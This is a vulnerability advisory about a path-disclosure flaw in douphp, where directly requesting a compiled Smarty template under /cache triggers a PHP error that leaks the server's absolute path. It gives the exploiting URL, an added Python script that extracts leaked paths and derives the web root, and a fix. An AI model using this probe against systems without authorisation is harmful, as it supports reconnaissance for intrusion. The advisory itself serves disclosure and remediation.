douphp /cache directory physical path disclosure

2016-01-28T00:00:00
ID SSV:90688
Type seebug
Reporter huakai
Modified 2016-01-28T00:00:00

Description

1. Vulnerability analysis

Vulnerable files

Every file under the cache directory (the PHP files Smarty compiles the templates into)

For example: admin/backup.htm.php

```php
<?php /* Smarty version 2.6.26, created on 2016-01-21 21:22:24 compiled from backup.htm */ ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title><?php echo $this->_tpl_vars['lang']['home']; ?>
```

The last line is what triggers the error. A compiled Smarty template is meant to be included from inside the Smarty object, where `$this` is bound. When the file is requested over HTTP it runs as a stand-alone script, `$this` is not in object context, and PHP raises a fatal error whose message ends with "in <absolute path of the file> on line N". If display_errors is on, that message, absolute path included, is written into the HTTP response.

2. Exploitation

Request the compiled template directly:

http://www.douco.com/cache/admin/backup.htm.php

Then view the page source: the PHP fatal error message in the response contains the absolute filesystem path of the cache file, which also reveals the web root.
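The check below is an added example, not part of the original advisory: it parses a PHP error message out of an HTTP response body, extracts the leaked absolute path, and derives the web root by matching the leaked path against the URL path that was requested. The sample response, the hostname and the /var/www/html/douphp path in it are constructed for the example and are not taken from a real douphp installation.

```python
"""Detect PHP error-message path disclosure (added example, not from the advisory).

Assumes the compiled cache file is reachable over HTTP and display_errors is on,
so the body contains something like
  Fatal error: Using $this when not in object context in /abs/path/file.php on line N
"""
import re
import urllib.error
import urllib.request
from typing import Dict, List, Optional
from urllib.parse import urlparse

# PHP reports errors as "<Level>: <message> in <path> on line <N>"; with
# html_errors=On the pieces are wrapped in <b>/<br /> tags, which we strip first.
_PHP_ERROR_RE = re.compile(
    r"(?P<level>Fatal error|Parse error|Warning|Notice|Deprecated)"
    r"\s*:\s*(?P<message>.*?)\s+in\s+(?P<path>(?:[A-Za-z]:\\|/)\S+?)"
    r"\s+on\s+line\s+(?P<line>\d+)",
    re.IGNORECASE | re.DOTALL,
)


def extract_leaked_paths(body: str) -> List[Dict]:
    """Return every PHP error in `body` together with the filesystem path it leaks."""
    text = re.sub(r"<[^>]+>", "", body).replace("&nbsp;", " ")
    return [
        {
            "level": m.group("level"),
            "message": m.group("message").strip(),
            "path": m.group("path"),
            "line": int(m.group("line")),
        }
        for m in _PHP_ERROR_RE.finditer(text)
    ]


def webroot_from_leak(leaked_path: str, requested_path: str) -> Optional[str]:
    """Derive the document root: /var/www/x/cache/a.php requested as /cache/a.php -> /var/www/x.

    Windows paths are normalised to forward slashes so the suffix test works on both."""
    leaked = leaked_path.replace("\\", "/")
    if not requested_path.startswith("/"):
        requested_path = "/" + requested_path
    if leaked.endswith(requested_path) and len(leaked) > len(requested_path):
        return leaked[: -len(requested_path)]
    return None


def check_url(url: str) -> Dict:
    """Fetch `url` and report leaks (network access; not used by the offline test).

    A 500 response still carries the error text, so HTTPError bodies are read too."""
    req = urllib.request.Request(url, headers={"User-Agent": "path-disclosure-check"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            body = resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as err:
        body = err.read().decode("utf-8", errors="replace")
    leaks = extract_leaked_paths(body)
    requested = urlparse(url).path
    return {
        "url": url,
        "leaks": leaks,
        "webroot": webroot_from_leak(leaks[0]["path"], requested) if leaks else None,
    }


# Constructed sample response (not captured from a real host): the compiled
# Smarty template from the advisory, executed outside the Smarty object with
# display_errors=On and html_errors=On. The path is an assumed example value.
SAMPLE_RESPONSE = (
    '<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" '
    '"http://www.w3.org/TR/html4/loose.dtd">\n<html>\n<head>\n'
    '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">\n'
    "<title><br />\n<b>Fatal error</b>:  Using $this when not in object context in "
    "<b>/var/www/html/douphp/cache/admin/backup.htm.php</b> on line <b>7</b><br />\n"
)
SAMPLE_REQUESTED_PATH = "/cache/admin/backup.htm.php"


if __name__ == "__main__":
    for leak in extract_leaked_paths(SAMPLE_RESPONSE):
        print(f"{leak['level']}: {leak['path']} (line {leak['line']})")
        print("web root:", webroot_from_leak(leak["path"], SAMPLE_REQUESTED_PATH))
```

Run `check_url("http://<host>/cache/admin/backup.htm.php")` against a test instance you are authorised to scan; an empty `leaks` list after the fix below is applied (or once the web server denies access to /cache) confirms the disclosure is closed.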

3. Fix

Turn off display of error messages (display_errors = Off in php.ini, keeping log_errors = On so errors still reach the server log). This hides the path but leaves the compiled templates reachable, so additionally deny direct HTTP access to the cache directory at the web server, so that compiled templates can only be included by the application.